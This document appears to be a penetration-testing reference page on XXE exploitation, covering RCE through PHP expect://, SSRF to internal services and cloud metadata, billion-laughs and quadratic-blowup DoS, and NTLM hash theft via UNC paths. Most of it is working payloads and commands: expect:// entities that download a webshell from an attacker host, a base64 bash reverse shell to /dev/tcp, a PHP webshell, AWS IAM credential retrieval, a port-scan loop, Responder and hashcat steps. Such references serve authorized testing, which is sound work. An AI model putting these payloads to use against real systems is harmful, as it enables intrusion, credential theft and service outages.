Skip to content

RCE and SSRF

XXE isn’t only about file reads. Four additional primitives depending on parser and target:

# 1. PHP expect:// for direct RCE (requires expect module loaded - uncommon)
<!ENTITY xxe SYSTEM "expect://curl$IFS-O$IFS'http://attacker/shell.php'">
# 2. SSRF - make the parser fetch internal URLs
<!ENTITY xxe SYSTEM "http://127.0.0.1:8080/admin">
<!ENTITY xxe SYSTEM "http://internal-service.local/api/secrets">
# 3. Billion laughs DoS (often blocked in modern parsers)
<!ENTITY a0 "DOS">
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;..."> (recursive expansion, 10^N total)
# 4. Windows UNC path → NTLM hash to attacker-controlled SMB
<!ENTITY xxe SYSTEM "\\attacker.example.com\share\anyfile">

Success indicator depends on path: shell on the target (RCE), internal service response leaked back via reflection or OOB (SSRF), target’s response slow/error/crash (DoS), or a Responder/SMB capture of the target’s NTLM hashes.

The expect:// wrapper is part of PHP’s pecl-expect extension. When loaded, it executes commands on the host:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "expect://id">
]>
<root><name>&xxe;</name></root>

If expect is loaded, the response includes the output of id:

Thanks uid=33(www-data) gid=33(www-data) groups=33(www-data)

That’s immediate RCE.

PHP expect is not enabled by default on any modern PHP install. It’s a manually-installed PECL extension, and most distros don’t include it in their default packages. In a real engagement, expect-enabled targets are rare - when you find one, it’s usually a legacy app or a deliberately weakened lab environment.

Always test for it even though it’s rare - the cost is one extra payload and the payoff is full RCE in a single shot.

<!ENTITY xxe SYSTEM "expect://id">

If the response contains the output of id, expect is loaded. If it returns empty, an error, or “wrapper not supported,” it’s not. Either way, move on.

Two constraints on what you can pass to expect://:

  1. XML reserved characters: <, >, &, ", ' will break the XML if used in the command without entity-encoding. Avoid them.
  2. URL syntax: characters with URL-special meaning (?, #, &, spaces) get parsed weirdly. Spaces in particular usually break the wrapper.

The standard workaround for spaces is $IFS (the shell’s Internal Field Separator, which defaults to space/tab/newline):

<!ENTITY xxe SYSTEM "expect://curl$IFS-O$IFS'http://attacker:8000/shell.php'">

Expands to: curl -O 'http://attacker:8000/shell.php'

For more complex commands, base64-encode and pipe to bash:

Terminal window
$ echo 'bash -c "/bin/bash -i >& /dev/tcp/attacker/4444 0>&1"' | base64
YmFzaCAtYyAiL2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2F0dGFja2VyLzQ0NDQgMD4mMSIK
<!ENTITY xxe SYSTEM "expect://echo$IFS'YmFzaC...K'|base64$IFS-d|bash">

Pipes (|) often survive in expect:// URLs but test first - some parsers URL-decode and break on |.

The cleanest single-shot RCE-to-shell pattern:

Terminal window
# On attacker host
$ echo '<?php system($_REQUEST["cmd"]);?>' > shell.php
$ python3 -m http.server 8000
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "expect://curl$IFS-o$IFS/var/www/html/shell.php$IFS'http://attacker:8000/shell.php'">
]>
<root><name>&xxe;</name></root>

The target uses curl to download your shell.php into its own webroot. Now you have a persistent webshell:

Terminal window
$ curl 'http://target/shell.php?cmd=id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Trade-off: dropping a file is louder than one-shot RCE - but persistent shell is worth the noise in most engagements.

When expect:// isn’t available, RCE through XXE alone usually isn’t possible. The pivots:

  • Use file disclosure to find credentials (see File disclosure) - DB passwords in config files, SSH keys, AWS keys
  • Use SSRF to reach internal services (next section) - internal admin panels, unauthenticated metadata services, internal API endpoints
  • Chain with another vulnerability - an upload, an SSTI in a different field, an admin-only function via IDOR

XXE without expect is “file read + SSRF + maybe DoS.” That’s still highly impactful.

External entity URIs aren’t limited to file://. The parser will resolve http:// and https:// URIs too, which makes XXE a vehicle for Server-Side Request Forgery - making the target’s parser fetch URLs from the target’s network perspective.

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://127.0.0.1:8080/">
]>
<root><name>&xxe;</name></root>

If the target has an admin panel on localhost:8080 not exposed externally, this fetches its homepage. The HTML response gets reflected back through the <name> field.

For non-reflected variants, use the OOB pattern from Blind exfil - your listener receives the internal response.

Loop XXE payloads over a port range and observe response differences:

Terminal window
$ for port in 22 80 443 3306 5432 6379 8080 8443 9000 11211; do
response=$(curl -s -X POST http://target/api/submit \
-H 'Content-Type: application/xml' \
--data "<?xml version='1.0'?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM 'http://127.0.0.1:$port/'>]>
<root><name>&xxe;</name></root>")
size=$(echo -n "$response" | wc -c)
echo "Port $port: $size bytes"
done

Patterns to look for:

ResponseLikely state
Reasonable HTML/JSON contentPort open, service responded
Empty / very small responsePort open but service didn’t respond as HTTP (e.g., SSH banner)
Connection refused errorPort closed
TimeoutPort filtered (firewall)

Note that timing varies per parser. Some parsers wait 30+ seconds on connection timeouts - set per-request timeouts in your scanner accordingly.

The classic high-value internal target on cloud hosts:

CloudMetadata URL
AWShttp://169.254.169.254/latest/meta-data/
AWS (IMDSv2 - requires PUT)Token-based; harder to use XXE for
GCPhttp://metadata.google.internal/computeMetadata/v1/ (needs Metadata-Flavor: Google header)
Azurehttp://169.254.169.254/metadata/instance (needs Metadata: true header)
Oracle Cloudhttp://192.0.0.192/latest/
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">

If the instance has an IAM role attached, this returns the role name. Follow up with:

<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/INSTANCE_ROLE">

Returns temporary AWS credentials (AccessKeyId, SecretAccessKey, SessionToken). Use with aws-cli to operate as the instance’s IAM role.

GCP and Azure require headers, which XXE alone can’t add - XML entity URLs don’t carry headers. For metadata services that require headers, XXE can confirm reachability but not actually retrieve credentials.

Beyond cloud metadata, internal admin panels are common XXE-SSRF targets:

ServiceDefault portSometimes accessible
Jenkins8080http://127.0.0.1:8080/script (Groovy console - direct RCE)
Tomcat manager8080http://127.0.0.1:8080/manager/html
Elasticsearch9200http://127.0.0.1:9200/_cluster/health
MongoDB REST28017http://127.0.0.1:28017/
Redis6379Not HTTP, but some Redis configs respond to HTTP-shaped queries
etcd2379http://127.0.0.1:2379/v2/keys/
Consul8500http://127.0.0.1:8500/v1/agent/self
Kubernetes API6443https://127.0.0.1:6443/api/v1/namespaces (usually requires auth)

Each is worth a probe - the value of finding one is high (often direct admin access on the internal service).

The protocols a parser supports vary:

Protocollibxml2 (PHP)Java SAX.NET XmlReader
file://YesYesYes
http://, https://YesYesYes
ftp://YesSometimesNo
gopher://NoSometimesNo
expect://If module loadedNoNo
jar://NoYesNo
netdoc://NoYesNo

Java’s jar:// protocol is particularly interesting - it fetches a JAR over HTTP and extracts a specific file from inside. Sometimes useful for blind exfil because the response timing differs from a raw HTTP fetch.

The historical denial-of-service payload:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY a0 "DOS">
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
<!ENTITY a5 "&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;">
<!ENTITY a6 "&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;">
<!ENTITY a7 "&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;">
<!ENTITY a8 "&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;">
<!ENTITY a9 "&a8;&a8;&a8;&a8;&a8;&a8;&a8;&a8;&a8;&a8;">
<!ENTITY a10 "&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;">
]>
<root><name>&a10;</name></root>

a10 resolves to 10 copies of a9, each of which is 10 copies of a8, … down to a0 which is the literal "DOS". Total expansion: 10¹¹ characters = 100 GB of memory. The parser tries to materialize the string, runs out of memory, crashes.

Every major XML parser shipped between 2012 and 2018 added protection:

  • libxml2 (PHP, Python lxml, others): enforces a hard limit on entity expansion (10MB default since 2.9.0, configurable via XML_PARSE_HUGE)
  • Java: XML_LIMIT_ENTITY_EXPANSION system property; defaults to 64,000 expansions
  • .NET: XmlReaderSettings.MaxCharactersFromEntities defaults to disabled

Modern targets reject the payload outright with “entity expansion limit exceeded” or just refuse to expand past the budget. Try it once on every XXE-vulnerable target to check, but expect failure.

Quadratic blowup - the actually-still-works variant

Section titled “Quadratic blowup - the actually-still-works variant”

A different DoS payload bypasses entity expansion limits by using a single entity many times:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY a "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...(10,000 chars)...aaa">
]>
<root>
&a;&a;&a;&a;&a;&a;&a;...(repeated 10,000 times)...&a;&a;&a;
</root>

This isn’t recursive - it’s just 10,000 references to a 10,000-char entity, producing 100MB output. Entity-expansion limits don’t catch it because there’s no recursion. Parsers with no output-size limit will materialize the full 100MB and slow down.

Modern parsers added output-size limits to address this, but the protection is patchier than recursive-expansion protection. Worth trying on targets where billion-laughs fails.

When the target is a Windows host parsing XML with external entity support, UNC paths trigger SMB connections - and SMB connections leak NTLM hashes:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "\\attacker.example.com\share\anyfile.txt">
]>
<root><name>&xxe;</name></root>

The parser tries to open the file via SMB. To authenticate the SMB connection, Windows sends the target service account’s NTLM hash to the attacker-controlled SMB server.

On the attacker host:

Terminal window
$ sudo responder -I eth0

Responder listens for SMB authentication attempts and captures NTLMv2 hashes:

[SMB] NTLMv2-SSP Client : 10.10.10.42
[SMB] NTLMv2-SSP Username : CORP\webapp_svc
[SMB] NTLMv2-SSP Hash : webapp_svc::CORP:1122334455667788:...

Crack offline with hashcat:

Terminal window
$ hashcat -m 5600 ntlmv2.txt rockyou.txt

If the service account uses a guessable password, you get plaintext credentials for a domain-joined account - direct path to lateral movement.

This works when:

  • The XML parser supports \\...\ UNC paths (some do, some don’t)
  • The target’s OS is Windows
  • The target can reach the attacker’s SMB port (445/TCP) outbound - many environments firewall this, but inside-out SMB is common in less-mature setups
  • The XML parser runs as a domain-joined account (workstation/local accounts also work but with less downstream value)

Outbound SMB from web servers is heavily monitored / firewalled in mature environments. In permissive networks (lab, internal apps, smaller orgs), this still works.

If outbound SMB is blocked but HTTP isn’t, some Windows components negotiate NTLM over HTTP for paths that look like web shares:

<!ENTITY xxe SYSTEM "http://attacker.example.com/share/anyfile">

If the parser uses Windows’s URL fetching APIs (which negotiate NTLM by default for non-Internet zones), it sends NTLM auth to your HTTP server. Capture with ntlmrelayx or a custom listener.

PrimitivePayload
RCE via expect (id check)<!ENTITY xxe SYSTEM "expect://id">
RCE webshell drop<!ENTITY xxe SYSTEM "expect://curl$IFS-o$IFS/var/www/html/s.php$IFS'http://A/s.php'">
SSRF localhost<!ENTITY xxe SYSTEM "http://127.0.0.1:8080/">
SSRF internal hostname<!ENTITY xxe SYSTEM "http://internal-api.local/admin">
SSRF AWS metadata<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
Port scan loopbash for-loop over ports + XXE per port
Billion-laughs DoSNested <!ENTITY aN> referencing aN-1 10 times each
Quadratic blowup DoSOne large entity, referenced 10000+ times in body
Windows UNC NTLM theft<!ENTITY xxe SYSTEM "\\attacker.com\share\file">
Capture NTLMsudo responder -I eth0
$IFS for spaces in expectexpect://curl$IFS-O$IFS'URL'
Detect expect loadedSend expect://id; if output appears, it’s loaded
Cloud metadata servicesAWS: 169.254.169.254; GCP: metadata.google.internal; Azure: 169.254.169.254

For tool-driven automation across the various XXE primitives (blind exfil, file read, port scan), see Automation.